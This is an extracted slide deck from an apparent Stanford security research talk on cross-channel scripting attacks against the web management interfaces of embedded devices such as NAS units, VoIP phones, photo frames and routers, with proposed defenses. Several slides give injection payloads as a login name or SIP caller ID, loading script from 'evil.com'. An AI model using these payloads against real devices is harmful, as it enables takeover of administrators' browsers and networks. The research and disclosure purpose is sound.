Stanford Computer Security Lab XCS. Cross Channel Scripting. Hristo Bojinov Elie Bursztein Dan Boneh Stanford Computer Security Lab



Similar documents
State of The Art: Automated Black Box Web Application Vulnerability Testing. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell

Adobe Systems Incorporated

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

Where every interaction matters.

Insecurity breeds at home

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

APNT#1184 WAN or Internet Access to GP-Pro EX. Introduction

Security Research Advisory IBM inotes 9 Active Content Filtering Bypass

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Gateway Apps - Security Summary SECURITY SUMMARY

Penetration Test Report

WEB 2.0 AND SECURITY

Thomas Röthlisberger IT Security Analyst

IBM. Vulnerability scanning and best practices

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

Essential IT Security Testing

Table of Contents. Introduction. Audience. At Course Completion

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

Securing your Linksys WRT54G

(WAPT) Web Application Penetration Testing

Secure Programming Lecture 12: Web Application Security III

ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus

ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details

Advanced Administration for Citrix NetScaler 9.0 Platinum Edition

Web Application Vulnerability Testing with Nessus

DRO-210i LOAD BALANCING ROUTER. Review Package Contents

Web-Application Security

Basic & Advanced Administration for Citrix NetScaler 9.2

How To Protect Your Computer From Being Hacked By A Hacker (For A Fee)

Web Application Security

Cloud Security:Threats & Mitgations

Securing Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group

Attack Vector Detail Report Atlassian

How to publish your NAS on the internet ThecusOS 6

Dual Bay Home Media Store. User Manual

OWASP Top Ten Tools and Tactics

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

FINAL DoIT v.8 APPLICATION SECURITY PROCEDURE

BYOD: End-to-End Security

Security Vulnerabilities in SOHO Routers Craig Heffner, Derek Yap

Check list for web developers

Setup and Configuration Setup Assistant Migration Assistant System Preferences Configuration Profiles System Information

NMS300 Network Management System

Project 2: Web Security Pitfalls

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Chapter 4 Managing Your Network

Workday Mobile Security FAQ

How to Hack Millions of Routers. Craig Heffner, Seismic LLC

SAMSUNG SMARTTV: HOW-TO TO CREATING INSECURE DEVICE IN TODAY S WORLD. Sergey Belov

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Chapter 4 Management. Viewing the Activity Log

Chapter 3 Management. Remote Management

QuickBooks Online: Security & Infrastructure

Web application security

Still Aren't Doing. Frank Kim

Lecture 1. Lecture Overview. Intro to Networking. Intro to Networking. Motivation behind Networking. Computer / Data Networks

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

JBoss security: penetration, protection and patching. David Jorm

Web Application Attacks and Countermeasures: Case Studies from Financial Systems

Hardening Guide. Installation Guide

IBM Security QRadar Vulnerability Manager Version User Guide IBM

Note: these functions are available if service provider supports them.

Virtualization System Security

WEB SITE SECURITY. Jeff Aliber Verizon Digital Media Services

Small Business Server Part 2

Half Bridge mode }These options are all found under Misc Configuration

What is Web Security? Motivation

Securing Data on Microsoft SQL Server 2012

Chapter 1 Web Application (In)security 1

Steltronic Focus. Main Desk Internet connection

Hardware + Software Solutions for The Best in Client Management & Security. Malcolm Hay Intel Technology Manager

How to setup camera with NAS

Hacking Web Apps. Detecting and Preventing Web Application Security Problems. Jorge Blanco Alcover. Mike Shema. Technical Editor SYNGRESS

05.0 Application Development

ReadyNAS Duo Setup Manual

SERENA SOFTWARE Serena Service Manager Security

Remote Attacks Against SOHO Routers. 08 February, 2010 Craig Heffner

CMPT 471 Networking II

How To Check If Your Router Is Working Properly On A Nr854T Router (Wnr854) On A Pc Or Mac) On Your Computer Or Ipad (Netbook) On An Ipad Or Ipa (Networking

National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research

Developing ASP.NET MVC 4 Web Applications MOC 20486

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Enterprise Application Security Workshop Series

What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things.

Guidance End User Devices Security Guidance: Apple ios 7

Chapter 6 Using Network Monitoring Tools

IP PBX. SD Card Slot. FXO Ports. PBX WAN port. FXO Ports LED, RED means online

Who is Watching You? Video Conferencing Security

Log Audit Ensuring Behavior Compliance Secoway elog System

Concierge SIEM Reporting Overview

Transcription:

Stanford Computer Security Lab XCS Cross Channel Scripting Hristo Bojinov Elie Bursztein Dan Boneh Stanford Computer Security Lab

What this talk is about? XCS (our new attack) Massively deployed devices Embedded web management interface How you can exploit XCS What we can do about it Why it is hard

devices?

Web management interface Managing embedded devices via a web interface: Easier for users Cheaper for vendors

Internet 240M registered domains 72M active domains Source Netcraft

Web security prominence Today: top server-side issue top client-side issue % Source: Sans top 20 Hristo Bojinov Elie Bursztein Dan Boneh Source: MITRE CVE trends Embedded Management Interfaces Emerging Massive Insecurity

Web application spectrum # users Popular Internet web sites Custom web applications devices? Consumer electronics Network infrastructure Security research # of sites

Embedded device prominence Embedded web applications are everywhere 100M+ WiFi access points also in millions of switches, printers, consumer electronics San Francisco WiFi access points Source: skyhookwireless

Embedded web servers will soon dominate 300 Growth Internet Embedded (NAS and photo frame only) 225 (Millions) 150 75 Data : - Parks associates - Netcraft 0 2008 2009 2010 2011 2012 2013

Spectrum revisited # users Popular web applications devices Custom web applications Security research # of sites

Recipe for a disaster Vendors build their own web applications Standard web server (sometimes) Custom web application stack Weak web security New features/services added at a fast pace Vendors compete on number of services in product Interactions between services vulnerabilities

Some vendors got it right... Kodak 1

... almost.

The result Vulnerabilities in every device we audited

Outline Audit methodology: auditing a zoo of devices Illustrative attacks XCS affect a wide range of things Defenses and lessons learned Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

Stanford Computer Security Lab Methodology

Audit methodology Brands Vulnerability types Device types

Overall audit results 8 categories of devices 16 different brands 23 devices 50+ vulnerabilities reported to CERT Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

Attack types Popular ones: Cross Site Scripting (XSS) Cross Site Request Forgeries (CSRF) Cross-Channel Scripting (XCS) attacks File security User authentication

Stored Cross Site Scripting (XSS) illustrated D-link DNS-323 Allows to share files Configured via Web

Stored XSS illustrated Web Form file system Web App NAS Fill a http form <script>..</script> reflect into the page: <script>..</script> Attacker

Attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

Cross Site Request Forgery (CSRF) illustrated Netgear FS750T2 Intelligent switch Configured via Web

CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web 3 Trigger POST (e.g. via Ads) Internet

Cross Channel Scripting (XCS) illustrated LaCie Ethernet disk mini Share access control Web interface Public FTP

XCS illustrated FTP server file system Web App NAS upload the file: <script>..</script>.pdf reflect the filename: <script>..</script>.pdf Attacker Admin Browser

Attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

XCS: cross-channel scripting Alternate Channels Web attacker Device User Injection Storage Reflection

Devices as stepping stones 2 Browse internet 6 Send malicious payload 1 Administer 4 infect 5 the access device files Internet 3 Trigger POST (e.g. via Ads) 7 Attack local network

Brands

Devices Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

Vulnerabilities by category Type Num XSS CSRF XCS RXCS File Auth LOM 3 Photo 3 framde NAS 5 Router 1 IP camera 3 IP phone 1 Switch 4 Printer 3 one vulnerability many vulnerability

4.2 List of Devices by Brand Devices by Brand Table 2 lists which types of devices were tested for each brand. As one can see we did test devices from vendors specialized in one type of product such as Buffalo, and from vendors that have a wide range of products such as D-link. Brand Camera LOM NAS Phone Photo Frame Printer Router Switch Allied Buffalo D-Link Dell estarling HP IBM Intel Kodak LaCie Linksys Netgear Panasonic QNAP Samsung SMC TrendNet Table 2: List of devices by brand Allied Telesis: Formerly Allied Telesync, is a telecommunications company specialized in

Attack surface Confidentiality Integrity Availability Access control Attribution

Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Access control 23 Access files without password Attribution 22 Don t log access

Stanford Computer Security Lab Illustrative Attacks

Login+Log XSS Quick warm-up: LOM LOM basics Log XSS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

Login+Log XSS LOM basics Lights-out recovery, maintenance, inventory tracking PCI card and chipset varieties available Separate NIC and admin login* Low-security default settings Motherboard connection Usually invisible to OS

Login+Log XSS Log XSS Known for a decade Traditionally injected via DNS Also see recent IBM BladeCenter advisory http://www.cert.fi/en/reports/2009/vulnerability2009029.html

Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> 2 Admin views syslog 3 Payload executes Internet

Login+Log XSS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

Cross Channel Scripting (XCS) Moving on to real XCS VoIP phone Photo frame Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

SIP XCS VoIP phone Linksys SPA942 Web interface SIP support Call logs

SIP XCS 1 SIP: xyz@mydomain calls abc@thatdomain Internet 2 RTP: carries actual binary data

SIP XCS 1 Attacker makes a call as <script src="//evil.com/"></script> 2 Administrator accesses web interface Internet 3 Payload executes

SIP XCS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

Photo frame sales

Photo frame XCS WiFi photo frame Samsung SPF85V RSS / URL feed Windows Live WMV / AVI

Photo frame XCS Fetch photos from the Internet. Watch movies too. Operation Use browser interface to set up You can also see the current photo! Many configuration fields: RSS, URLs, etc...

Photo frame XCS 1 Attacker infects via CSRF 2 User connects to manage 3 Payload executes Internet

Photo frame XCS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

Photo frames as stepping stones 2 Son connects to upload photos Internet 3 Intranet infected 1 Frame gets infected via grandma s browser

Photo frame XCS Bonus feature : Current photo visible without login

A vehicle for scams? estarling photo frame receive photos via email predictable address Frame error! Call us 666-6666

Stanford Computer Security Lab XCS reloaded API based XCS

Restful API Many popular web services share data via RESTful API such as Twitter, Facebook, Myspace... REST stand for Representational State Transfert It is designed to work over HTTP

REST API advantage Client-server Stateless Cacheable Uniform interface Return data in various format : XML, JSON...

Twitpic use Twitter API

Mafia Wars on facebook plateform

Where XCS arise? Consumer trust producer Each producer has it own filtering policy Each consumer has it own filtering policy The filerting applied is not explicitly defined

Example

Stanford Computer Security Lab XCS revolution Phone based XCS

Modern smartphone Modern smartphone extensively use HTML view

Example WebOS 1.04 was vulnerable to XCS attack The payload was injected via a calendar Reflected to the calendar application

Stanford Computer Security Lab Defenses

Defense approaches Today Internal audits by IT staff and end-users Near-term SiteFirewall: IT, browser vendors Long-term Server-side security gains

SiteFirewall Injected script can issue requests at will: <script src= http://evil.com > Before

SiteFirewall SiteFirewall (a Firefox extension), prevents internal websites from accessing the Internet. Internet

SiteFirewall Page interactions with the Internet blocked. After

Server-side defenses Difficulties No standard platform to build for Adding insecure features: unavoidable Requirements Security is a top priority Performance trade-offs possible Architectural trade-offs: OS vs. Framework

Server-side defenses OS level Use captchas Process sandboxing Control flow Data storage and access model Framework Secure embedded web applications RoR too heavyweight in this context

Static analysis Analyze if combining two give filtering policy is secure On going work

Stanford Computer Security Lab One more thing

Another boring NAS device? SOHO NAS Buffalo LS-CHL BitTorrent support!

Massive exploitation takeover Create a bad torrent takeover Internet Famous_movie.torrent

Peer-to-peer XCS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

Conclusion Sticky technology Standardize... remote access firmware upgrade rendering to HTML configuration backup Thanks to Eric Lovett and Parks Associates!

Stanford Computer Security Lab Questions? http://seclab.stanford.edu

Configuration file XCS WiFi router Linksys WRT54G2 Standard features Config backup Mature technology...

Configuration file XCS Save file Restore file Configuration file Tampering with the file

Configuration file XCS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

An easy fix Sign with a device private key!

What about arbitrary file inclusion? Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

More attacks: Switches Netgear switch Trendnet switch

More attacks: LOM IBM RSA II Intel vpro/amt